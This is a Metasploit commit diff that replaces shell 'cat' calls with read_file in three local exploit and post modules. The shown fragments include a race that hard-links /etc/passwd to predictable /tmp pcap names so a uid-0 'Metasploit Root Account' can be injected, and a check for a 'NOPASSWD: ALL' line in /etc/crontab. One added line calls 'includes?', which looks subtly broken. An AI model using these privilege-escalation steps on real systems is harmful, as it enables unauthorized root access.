Land #7377, read_file for some modules

2024-09-04 20:18:27 +02:00 · 2016-09-28 18:00:23 -05:00 · 2016-09-28 18:00:23 -05:00 · bcb040c1ac
commit bcb040c1ac
parent 075401d702 2272e15ca2
3 changed files with 5 additions and 5 deletions
--- a/modules/exploits/linux/local/netfilter_priv_esc.rb
+++ b/modules/exploits/linux/local/netfilter_priv_esc.rb
@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Local
    def shemsham_installed?()
      # we want this to be false.
      vprint_status('Checking if shem or sham are installed')
-      shemsham = cmd_exec('cat /proc/cpuinfo')
+      shemsham = read_file('/proc/cpuinfo')
      if shemsham.include?('shem')
        print_error('shem installed, system not vulnerable.')
      elsif shemsham.include?('sham')
--- a/modules/exploits/osx/local/rsh_libmalloc.rb
+++ b/modules/exploits/osx/local/rsh_libmalloc.rb
@ -123,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Local
    vprint_status("Now to check whether the script worked...")

    # Check whether it worked
-    crontab = cmd_exec("cat /etc/crontab")
+    crontab = read_file("/etc/crontab")
    vprint_status("Reading crontab yielded the following response: #{crontab}")
    unless crontab.include? "ALL ALL=(ALL) NOPASSWD: ALL"
      vprint_error("Bad news... it did not write to the file.")
--- a/modules/post/multi/escalate/metasploit_pcaplog.rb
+++ b/modules/post/multi/escalate/metasploit_pcaplog.rb
@ -63,7 +63,7 @@ class MetasploitModule < Msf::Post

  def run
    print_status "Setting up the victim's /tmp dir"
-    initial_size = cmd_exec("cat /etc/passwd | wc -l")
+    initial_size = read_file("/etc/passwd").lines.count
    print_status "/etc/passwd is currently #{initial_size} lines long"
    i = 0
    j = 0
@ -75,7 +75,7 @@ class MetasploitModule < Msf::Post
        print_status "Linking /etc/passwd to predictable tmp files (Attempt #{j})"
        cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done")
      end
-      current_size = cmd_exec("cat /etc/passwd | wc -l")
+      current_size = read_file("/etc/passwd").lines.count
      if current_size == initial_size
        # PCAP is flowing
        pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"
@ -92,7 +92,7 @@ class MetasploitModule < Msf::Post
      i = (i+1) % 60 # increment second counter
    end

-    if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true")
+    if read_file("/etc/passwd").includes?("Metasploit")
      print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account")
      # TODO: Consider recording our now-created username and password as a valid credential here.
    else